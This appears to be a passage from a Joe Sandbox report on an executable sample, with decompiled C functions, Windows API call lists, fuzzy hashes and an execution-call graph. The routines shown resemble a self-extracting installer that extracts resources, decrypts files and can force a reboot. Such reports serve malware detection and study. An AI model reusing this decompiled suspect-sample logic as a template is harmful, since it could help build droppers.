                                                                                                                                                                                                      						_t10 = 1;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(_t16);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return _t10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *_t16 == 0x5c) {
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}










                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,003E2B33), ref: 003E6602
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 003E6612
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 003E6629
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 003E6635
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Prev$Next
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3260447230-0
                                                                                                                                                                                                      • Opcode ID: eab203f2fb9f62c6848620436e979ce0628a41b5d9c30255b9a49835b47f026e
                                                                                                                                                                                                      • Instruction ID: a0e7a331eb366b2f1f05883e86898734f6cdfd13b1bc3003d520270768913044
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eab203f2fb9f62c6848620436e979ce0628a41b5d9c30255b9a49835b47f026e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F02D310045E06ED7331B2A4CC89BBBF9CDFE7394F1A436FE4D596081D7150D068661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E69B0() {
                                                                                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                                                                                      				intOrPtr* _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				 *0x3e81f8 = E003E6C70();
                                                                                                                                                                                                      				__set_app_type(E003E6FBE(2));
                                                                                                                                                                                                      				 *0x3e88a4 =  *0x3e88a4 | 0xffffffff;
                                                                                                                                                                                                      				 *0x3e88a8 =  *0x3e88a8 | 0xffffffff;
                                                                                                                                                                                                      				_t4 = __p__fmode();
                                                                                                                                                                                                      				_t11 =  *0x3e8528; // 0x0
                                                                                                                                                                                                      				 *_t4 = _t11;
                                                                                                                                                                                                      				_t5 = __p__commode();
                                                                                                                                                                                                      				_t12 =  *0x3e851c; // 0x0
                                                                                                                                                                                                      				 *_t5 = _t12;
                                                                                                                                                                                                      				_t6 = E003E7000();
                                                                                                                                                                                                      				if( *0x3e8000 == 0) {
                                                                                                                                                                                                      					__setusermatherr(E003E7000);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E003E71EF(_t6);
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 003E6FC5
                                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 003E69C2
                                                                                                                                                                                                      • __p__fmode.MSVCRT ref: 003E69D8
                                                                                                                                                                                                      • __p__commode.MSVCRT ref: 003E69E6
                                                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 003E6A07
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1632413811-0
                                                                                                                                                                                                      • Opcode ID: 7702c99b0caeb8733f0327b6fbcf20895ec80062d65f788f8f081894c5994c27
                                                                                                                                                                                                      • Instruction ID: 151f52186dafa072403e720cbf19d9dfb81856eeb6fea9328a888fbe53b31314
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7702c99b0caeb8733f0327b6fbcf20895ec80062d65f788f8f081894c5994c27
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AF0F8B09087D18FC777AB31ED8A6043B6AFB05321F100B19E465AE2E1CF3A95418A11
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E6952(CHAR* __ecx) {
                                                                                                                                                                                                      				long _v8;
                                                                                                                                                                                                      				long _v12;
                                                                                                                                                                                                      				long _v16;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				_v16 = 0;
                                                                                                                                                                                                      				if( *__ecx != 0) {
                                                                                                                                                                                                      					_t6 =  &_v20; // 0x3e5760
                                                                                                                                                                                                      					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                                                                                                                                                                      						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t22;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W>,?,00000000,003E5760,?,A:\), ref: 003E697F
                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 003E6999
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DiskFreeSpace
                                                                                                                                                                                                      • String ID: `W>
                                                                                                                                                                                                      • API String ID: 1705453755-2198717450
                                                                                                                                                                                                      • Opcode ID: 723da3a829c274cebaf179e7f918ed6f2aeb0a00b6362a625fc983e07e8dcf01
                                                                                                                                                                                                      • Instruction ID: 10ed2ecff7cec92dbfd5641e249289b89f3045a029944e7d8bc0a411aa4ba9f3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 723da3a829c274cebaf179e7f918ed6f2aeb0a00b6362a625fc983e07e8dcf01
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EF0E7B6D00268BBCB12DFE98C45ADEBBBCEB48700F104696B510E6280D671AA008B91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:28.6%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                      Total number of Nodes:960
                                                                                                                                                                                                      Total number of Limit Nodes:25
2360->2362 2363 e6ac7 _amsg_exit 2361->2363 2365 e6ad1 2361->2365 2362->2360 2363->2365 2364 e6b13 _initterm 2366 e6b2e __IsNonwritableInCurrentImage 2364->2366 2365->2364 2365->2366 2368 e6af4 2365->2368 2367 e6bd6 _ismbblead 2366->2367 2369 e6c1e 2366->2369 2372 e6bbe exit 2366->2372 2378 e2bfb GetVersion 2366->2378 2367->2366 2369->2368 2371 e6c27 _cexit 2369->2371 2371->2368 2372->2366 2374 e717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2374 2375 e717a 2373->2375 2377 e71cd 2374->2377 2375->2374 2376 e71e2 2375->2376 2376->2358 2377->2376 2379 e2c0f 2378->2379 2380 e2c50 2378->2380 2379->2380 2381 e2c13 GetModuleHandleW 2379->2381 2395 e2caa memset memset memset 2380->2395 2381->2380 2383 e2c22 GetProcAddress 2381->2383 2383->2380 2392 e2c34 2383->2392 2385 e2c8e 2386 e2c9e 2385->2386 2387 e2c97 CloseHandle 2385->2387 2386->2366 2387->2386 2392->2380 2393 e2c89 2489 e1f90 2393->2489 2506 e468f FindResourceA SizeofResource 2395->2506 2398 e2ef3 2401 e44b9 20 API calls 2398->2401 2399 e2d2d CreateEventA SetEvent 2400 e468f 7 API calls 2399->2400 2402 e2d57 2400->2402 2403 e2d6e 2401->2403 2404 e2d5b 2402->2404 2406 e2e1f 2402->2406 2409 e468f 7 API calls 2402->2409 2407 e6ce0 4 API calls 2403->2407 2405 e44b9 20 API calls 2404->2405 2405->2403 2511 e5c9e 2406->2511 2410 e2c62 2407->2410 2412 e2d9f 2409->2412 2410->2385 2436 e2f1d 2410->2436 2412->2404 2415 e2da3 CreateMutexA 2412->2415 2413 e2e3a 2416 e2e52 FindResourceA 2413->2416 2417 e2e43 2413->2417 2414 e2e30 2414->2398 2415->2406 2418 e2dbd GetLastError 2415->2418 2421 e2e6e 2416->2421 2422 e2e64 LoadResource 2416->2422 2537 e2390 2417->2537 2418->2406 2420 e2dca 2418->2420 2424 e2dea 2420->2424 2425 e2dd5 2420->2425 2423 e2e4d 2421->2423 2552 e36ee GetVersionExA 2421->2552 2422->2421 2423->2403 2426 e44b9 20 API calls 2424->2426 2427 e44b9 20 API calls 2425->2427 2428 e2dff 2426->2428 2430 e2de8 2427->2430 2428->2406 2431 e2e04 CloseHandle 
2428->2431 2430->2431 2431->2403 2435 e6517 24 API calls 2435->2423 2437 e2f3f 2436->2437 2438 e2f6c 2436->2438 2440 e2f5f 2437->2440 2641 e51e5 2437->2641 2660 e5164 2438->2660 2788 e3a3f 2440->2788 2442 e2f71 2472 e303c 2442->2472 2673 e55a0 2442->2673 2448 e6ce0 4 API calls 2450 e2c6b 2448->2450 2449 e2f86 GetSystemDirectoryA 2451 e658a CharPrevA 2449->2451 2476 e52b6 2450->2476 2452 e2fab LoadLibraryA 2451->2452 2453 e2ff7 FreeLibrary 2452->2453 2454 e2fc0 GetProcAddress 2452->2454 2455 e3006 2453->2455 2456 e3017 SetCurrentDirectoryA 2453->2456 2454->2453 2457 e2fd6 DecryptFileA 2454->2457 2455->2456 2721 e621e GetWindowsDirectoryA 2455->2721 2458 e3026 2456->2458 2459 e3054 2456->2459 2457->2453 2464 e2ff0 2457->2464 2462 e44b9 20 API calls 2458->2462 2460 e3061 2459->2460 2731 e3b26 2459->2731 2466 e307a 2460->2466 2460->2472 2740 e256d 2460->2740 2468 e3037 2462->2468 2464->2453 2470 e3098 2466->2470 2751 e3ba2 2466->2751 2807 e6285 GetLastError 2468->2807 2470->2472 2473 e30af 2470->2473 2472->2448 2809 e4169 2473->2809 2477 e52d6 2476->2477 2486 e5316 2476->2486 2480 e5300 LocalFree LocalFree 2477->2480 2482 e52eb SetFileAttributesA DeleteFileA 2477->2482 2478 e5374 2479 e538c 2478->2479 3115 e1fe1 2478->3115 2481 e6ce0 4 API calls 2479->2481 2480->2477 2480->2486 2484 e2c72 2481->2484 2482->2480 2484->2385 2484->2393 2485 e535e SetCurrentDirectoryA 2488 e2390 13 API calls 2485->2488 2486->2478 2486->2485 2487 e65e8 4 API calls 2486->2487 2487->2485 2488->2478 2490 e1f9a 2489->2490 2491 e1f9f 2489->2491 2492 e1ea7 15 API calls 2490->2492 2493 e1fc0 2491->2493 2496 e44b9 20 API calls 2491->2496 2497 e1fd9 2491->2497 2492->2491 2494 e1fcf ExitWindowsEx 2493->2494 2495 e1ee2 GetCurrentProcess OpenProcessToken 2493->2495 2493->2497 2494->2497 2499 e1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2501 e1f0e 2495->2501 2496->2493 2497->2385 2500 e1f6b ExitWindowsEx 2499->2500 2499->2501 2500->2501 2502 e1f1f 2500->2502 2503 e44b9 20 API 
calls 2501->2503 2504 e6ce0 4 API calls 2502->2504 2503->2502 2505 e1f8c 2504->2505 2505->2385 2507 e46b6 2506->2507 2509 e2d1a 2506->2509 2508 e46be FindResourceA LoadResource LockResource 2507->2508 2507->2509 2508->2509 2510 e46df memcpy_s FreeResource 2508->2510 2509->2398 2509->2399 2510->2509 2517 e5e17 2511->2517 2520 e5cc3 2511->2520 2512 e6ce0 4 API calls 2514 e2e2c 2512->2514 2513 e5dd0 2516 e5dec GetModuleFileNameA 2513->2516 2513->2517 2514->2413 2514->2414 2515 e5ced CharNextA 2515->2520 2516->2517 2518 e5e0a 2516->2518 2517->2512 2587 e66c8 2518->2587 2520->2513 2520->2515 2520->2517 2521 e6218 2520->2521 2524 e5e36 CharUpperA 2520->2524 2530 e5f9f CharUpperA 2520->2530 2531 e5f59 CompareStringA 2520->2531 2532 e6003 CharUpperA 2520->2532 2533 e5edc CharUpperA 2520->2533 2534 e60a2 CharUpperA 2520->2534 2535 e667f IsDBCSLeadByte CharNextA 2520->2535 2592 e658a 2520->2592 2596 e6e2a 2521->2596 2524->2520 2525 e61d0 2524->2525 2526 e44b9 20 API calls 2525->2526 2527 e61e7 2526->2527 2528 e61f7 ExitProcess 2527->2528 2529 e61f0 CloseHandle 2527->2529 2529->2528 2530->2520 2531->2520 2532->2520 2533->2520 2534->2520 2535->2520 2538 e24cb 2537->2538 2539 e23b9 2537->2539 2540 e6ce0 4 API calls 2538->2540 2539->2538 2542 e23e9 FindFirstFileA 2539->2542 2541 e24dc 2540->2541 2541->2423 2542->2538 2550 e2407 2542->2550 2543 e2479 2547 e2488 SetFileAttributesA DeleteFileA 2543->2547 2544 e2421 lstrcmpA 2545 e24a9 FindNextFileA 2544->2545 2546 e2431 lstrcmpA 2544->2546 2548 e24bd FindClose RemoveDirectoryA 2545->2548 2545->2550 2546->2545 2546->2550 2547->2545 2548->2538 2549 e658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2545 2550->2549 2551 e2390 5 API calls 2550->2551 2551->2550 2556 e3737 2552->2556 2558 e372d 2552->2558 2553 e44b9 20 API calls 2566 e39fc 2553->2566 2554 e6ce0 4 API calls 2555 e2e92 2554->2555 2555->2403 2555->2423 2567 e18a3 2555->2567 2556->2558 2559 e38a4 2556->2559 2556->2566 2603 e28e8 2556->2603 2558->2553 2558->2566 
2559->2558 2560 e39c1 MessageBeep 2559->2560 2559->2566 2561 e681f 10 API calls 2560->2561 2562 e39ce 2561->2562 2563 e39d8 MessageBoxA 2562->2563 2564 e67c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2554 2568 e19b8 2567->2568 2569 e18d5 2567->2569 2571 e6ce0 4 API calls 2568->2571 2632 e17ee LoadLibraryA 2569->2632 2573 e19d5 2571->2573 2573->2423 2573->2435 2574 e18e5 GetCurrentProcess OpenProcessToken 2574->2568 2575 e1900 GetTokenInformation 2574->2575 2576 e19aa CloseHandle 2575->2576 2577 e1918 GetLastError 2575->2577 2576->2568 2577->2576 2578 e1927 LocalAlloc 2577->2578 2579 e1938 GetTokenInformation 2578->2579 2580 e19a9 2578->2580 2581 e194e AllocateAndInitializeSid 2579->2581 2582 e19a2 LocalFree 2579->2582 2580->2576 2581->2582 2586 e196e 2581->2586 2582->2580 2583 e1999 FreeSid 2583->2582 2584 e1975 EqualSid 2585 e198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2588 e66d5 2587->2588 2589 e66f3 2588->2589 2591 e66e5 CharNextA 2588->2591 2599 e6648 2588->2599 2589->2517 2591->2588 2593 e659b 2592->2593 2593->2593 2594 e65b8 CharPrevA 2593->2594 2595 e65ab 2593->2595 2594->2595 2595->2520 2602 e6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 e621d 2600 e665d IsDBCSLeadByte 2599->2600 2601 e6668 2599->2601 2600->2601 2601->2588 2602->2598 2604 e2a62 2603->2604 2611 e290d 2603->2611 2605 e2a6e GlobalFree 2604->2605 2606 e2a75 2604->2606 2605->2606 2606->2559 2608 e2955 GlobalAlloc 2608->2604 2609 e2968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 e2a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 e2a80 GlobalUnlock 2611->2612 2613 e2773 2611->2613 2612->2604 2614 e28b2 2613->2614 2615 e27a3 CharUpperA CharNextA CharNextA 2613->2615 2617 e28b7 GetSystemDirectoryA 2614->2617 2616 e27db 2615->2616 2615->2617 2618 e28a8 GetWindowsDirectoryA 2616->2618 2620 e27e3 2616->2620 2619 e28bf 2617->2619 2618->2619 2621 e28d2 2619->2621 2622 e658a 
CharPrevA 2619->2622 2624 e658a CharPrevA 2620->2624 2623 e6ce0 4 API calls 2621->2623 2622->2621 2625 e28e2 2623->2625 2626 e2810 RegOpenKeyExA 2624->2626 2625->2611 2626->2619 2627 e2837 RegQueryValueExA 2626->2627 2628 e285c 2627->2628 2629 e289a RegCloseKey 2627->2629 2630 e2867 ExpandEnvironmentStringsA 2628->2630 2631 e287a 2628->2631 2629->2619 2630->2631 2631->2629 2633 e1826 GetProcAddress 2632->2633 2634 e1890 2632->2634 2636 e1889 FreeLibrary 2633->2636 2637 e1839 AllocateAndInitializeSid 2633->2637 2635 e6ce0 4 API calls 2634->2635 2638 e189f 2635->2638 2636->2634 2637->2636 2639 e185f FreeSid 2637->2639 2638->2568 2638->2574 2639->2636 2642 e468f 7 API calls 2641->2642 2643 e51f9 LocalAlloc 2642->2643 2644 e522d 2643->2644 2645 e520d 2643->2645 2647 e468f 7 API calls 2644->2647 2646 e44b9 20 API calls 2645->2646 2648 e521e 2646->2648 2649 e523a 2647->2649 2652 e6285 GetLastError 2648->2652 2650 e523e 2649->2650 2651 e5262 lstrcmpA 2649->2651 2653 e44b9 20 API calls 2650->2653 2654 e527e 2651->2654 2655 e5272 LocalFree 2651->2655 2657 e2f4d 2652->2657 2656 e524f LocalFree 2653->2656 2658 e44b9 20 API calls 2654->2658 2655->2657 2656->2657 2657->2438 2657->2440 2657->2472 2659 e5290 LocalFree 2658->2659 2659->2657 2661 e468f 7 API calls 2660->2661 2662 e5175 2661->2662 2663 e517a 2662->2663 2664 e51af 2662->2664 2665 e44b9 20 API calls 2663->2665 2666 e468f 7 API calls 2664->2666 2667 e518d 2665->2667 2668 e51c0 2666->2668 2667->2442 2822 e6298 2668->2822 2671 e51e1 2671->2442 2672 e44b9 20 API calls 2672->2667 2674 e468f 7 API calls 2673->2674 2675 e55c7 LocalAlloc 2674->2675 2676 e55fd 2675->2676 2677 e55db 2675->2677 2678 e468f 7 API calls 2676->2678 2679 e44b9 20 API calls 2677->2679 2680 e560a 2678->2680 2681 e55ec 2679->2681 2682 e560e 2680->2682 2683 e5632 lstrcmpA 2680->2683 2684 e6285 GetLastError 2681->2684 2685 e44b9 20 API calls 2682->2685 2686 e564b LocalFree 2683->2686 2687 e5645 2683->2687 2705 e55f1 2684->2705 2688 e561f LocalFree 
2685->2688 2689 e565b 2686->2689 2690 e5696 2686->2690 2687->2686 2688->2705 2697 e5467 49 API calls 2689->2697 2691 e589f 2690->2691 2694 e56ae GetTempPathA 2690->2694 2692 e6517 24 API calls 2691->2692 2692->2705 2693 e6ce0 4 API calls 2695 e2f7e 2693->2695 2696 e56c3 2694->2696 2698 e56eb 2694->2698 2695->2449 2695->2472 2834 e5467 2696->2834 2700 e5678 2697->2700 2703 e586c GetWindowsDirectoryA 2698->2703 2704 e5717 GetDriveTypeA 2698->2704 2698->2705 2702 e44b9 20 API calls 2700->2702 2700->2705 2702->2705 2868 e597d GetCurrentDirectoryA SetCurrentDirectoryA 2703->2868 2706 e5730 GetFileAttributesA 2704->2706 2719 e572b 2704->2719 2705->2693 2706->2719 2710 e597d 34 API calls 2710->2719 2711 e5467 49 API calls 2711->2698 2712 e2630 21 API calls 2712->2719 2714 e57c1 GetWindowsDirectoryA 2714->2719 2715 e658a CharPrevA 2716 e57e8 GetFileAttributesA 2715->2716 2717 e57fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 e5827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2705 2719->2706 2719->2710 2719->2712 2719->2714 2719->2715 2719->2718 2720 e5467 49 API calls 2719->2720 2864 e6952 2719->2864 2720->2719 2722 e6268 2721->2722 2723 e6249 2721->2723 2724 e597d 34 API calls 2722->2724 2725 e44b9 20 API calls 2723->2725 2727 e625f 2724->2727 2726 e625a 2725->2726 2728 e6285 GetLastError 2726->2728 2729 e6ce0 4 API calls 2727->2729 2728->2727 2730 e3013 2729->2730 2730->2456 2730->2472 2732 e3b2d 2731->2732 2732->2732 2733 e3b72 2732->2733 2734 e3b53 2732->2734 2934 e4fe0 2733->2934 2736 e6517 24 API calls 2734->2736 2737 e3b70 2736->2737 2738 e3b7b 2737->2738 2739 e6298 10 API calls 2737->2739 2738->2460 2739->2738 2741 e2622 2740->2741 2742 e2583 2740->2742 2961 e24e0 GetWindowsDirectoryA 2741->2961 2744 e258b 2742->2744 2745 e25e8 RegOpenKeyExA 2742->2745 2747 e25e3 2744->2747 2749 e259b RegOpenKeyExA 2744->2749 2746 e2609 RegQueryInfoKeyA 2745->2746 2745->2747 2748 e25d1 RegCloseKey 2746->2748 2747->2466 2748->2747 2749->2747 2750 e25bc 
RegQueryValueExA 2749->2750 2750->2748 2752 e3bdb 2751->2752 2761 e3bec 2751->2761 2753 e468f 7 API calls 2752->2753 2753->2761 2754 e3c03 memset 2754->2761 2755 e3d13 2756 e44b9 20 API calls 2755->2756 2757 e3d26 2756->2757 2760 e6ce0 4 API calls 2757->2760 2758 e468f 7 API calls 2758->2761 2762 e3f60 2760->2762 2761->2754 2761->2755 2761->2757 2761->2758 2763 e3fd7 2761->2763 2764 e3d7b CompareStringA 2761->2764 2766 e3fab 2761->2766 2769 e3f1e LocalFree 2761->2769 2770 e3f46 LocalFree 2761->2770 2774 e3cc7 CompareStringA 2761->2774 2785 e3e10 2761->2785 2969 e1ae8 2761->2969 3010 e202a memset memset RegCreateKeyExA 2761->3010 3036 e3fef 2761->3036 2762->2470 2763->2757 3060 e2267 2763->3060 2764->2761 2764->2763 2768 e44b9 20 API calls 2766->2768 2772 e3fbe LocalFree 2768->2772 2769->2761 2769->2763 2770->2757 2772->2757 2774->2761 2775 e3e1f GetProcAddress 2778 e3f64 2775->2778 2775->2785 2776 e3f92 2777 e44b9 20 API calls 2776->2777 2779 e3fa9 2777->2779 2780 e44b9 20 API calls 2778->2780 2781 e3f7c LocalFree 2779->2781 2782 e3f75 FreeLibrary 2780->2782 2783 e6285 GetLastError 2781->2783 2782->2781 2784 e3f8b 2783->2784 2784->2757 2785->2775 2785->2776 2786 e3eff FreeLibrary 2785->2786 2787 e3f40 FreeLibrary 2785->2787 3050 e6495 2785->3050 2786->2769 2787->2770 2789 e468f 7 API calls 2788->2789 2790 e3a55 LocalAlloc 2789->2790 2791 e3a8e 2790->2791 2792 e3a6c 2790->2792 2794 e468f 7 API calls 2791->2794 2793 e44b9 20 API calls 2792->2793 2795 e3a7d 2793->2795 2796 e3a98 2794->2796 2797 e6285 GetLastError 2795->2797 2798 e3a9c 2796->2798 2799 e3ac5 lstrcmpA 2796->2799 2805 e2f64 2797->2805 2800 e44b9 20 API calls 2798->2800 2801 e3b0d LocalFree 2799->2801 2802 e3ada 2799->2802 2803 e3aad LocalFree 2800->2803 2801->2805 2804 e6517 24 API calls 2802->2804 2803->2805 2806 e3aec LocalFree 2804->2806 2805->2438 2805->2472 2806->2805 2808 e628f 2807->2808 2808->2472 2810 e468f 7 API calls 2809->2810 2811 e417d LocalAlloc 2810->2811 2812 e41a8 2811->2812 2813 e4195 
2811->2813 2815 e468f 7 API calls 2812->2815 2814 e44b9 20 API calls 2813->2814 2816 e41a6 2814->2816 2817 e41b5 2815->2817 2816->2472 2818 e41b9 2817->2818 2819 e41c5 lstrcmpA 2817->2819 2821 e44b9 20 API calls 2818->2821 2819->2818 2820 e41e6 LocalFree 2819->2820 2820->2816 2821->2820 2823 e171e _vsnprintf 2822->2823 2833 e62c9 FindResourceA 2823->2833 2825 e62cb LoadResource LockResource 2826 e6353 2825->2826 2829 e62e0 2825->2829 2827 e6ce0 4 API calls 2826->2827 2828 e51ca 2827->2828 2828->2671 2828->2672 2830 e631b FreeResource 2829->2830 2831 e6355 FreeResource 2829->2831 2832 e171e _vsnprintf 2830->2832 2831->2826 2832->2833 2833->2825 2833->2826 2835 e548a 2834->2835 2837 e551a 2834->2837 2894 e53a1 2835->2894 2905 e58c8 2837->2905 2838 e5581 2842 e6ce0 4 API calls 2838->2842 2841 e5495 2841->2838 2847 e550c 2841->2847 2848 e54c2 GetSystemInfo 2841->2848 2849 e559a 2842->2849 2843 e554d 2843->2838 2850 e597d 34 API calls 2843->2850 2844 e553b CreateDirectoryA 2845 e5577 2844->2845 2846 e5547 2844->2846 2851 e6285 GetLastError 2845->2851 2846->2843 2852 e658a CharPrevA 2847->2852 2855 e54da 2848->2855 2849->2705 2858 e2630 GetWindowsDirectoryA 2849->2858 2853 e555c 2850->2853 2854 e557c 2851->2854 2852->2837 2853->2838 2857 e5568 RemoveDirectoryA 2853->2857 2854->2838 2855->2847 2856 e658a CharPrevA 2855->2856 2856->2847 2857->2838 2859 e265e 2858->2859 2860 e266f 2858->2860 2862 e44b9 20 API calls 2859->2862 2861 e6ce0 4 API calls 2860->2861 2863 e2687 2861->2863 2862->2860 2863->2698 2863->2711 2865 e696e GetDiskFreeSpaceA 2864->2865 2866 e69a1 2864->2866 2865->2866 2867 e6989 MulDiv 2865->2867 2866->2719 2867->2866 2869 e59dd GetDiskFreeSpaceA 2868->2869 2870 e59bb 2868->2870 2872 e5ba1 memset 2869->2872 2873 e5a21 MulDiv 2869->2873 2871 e44b9 20 API calls 2870->2871 2874 e59cc 2871->2874 2875 e6285 GetLastError 2872->2875 2873->2872 2876 e5a50 GetVolumeInformationA 2873->2876 2877 e6285 GetLastError 2874->2877 2878 e5bbc GetLastError FormatMessageA 
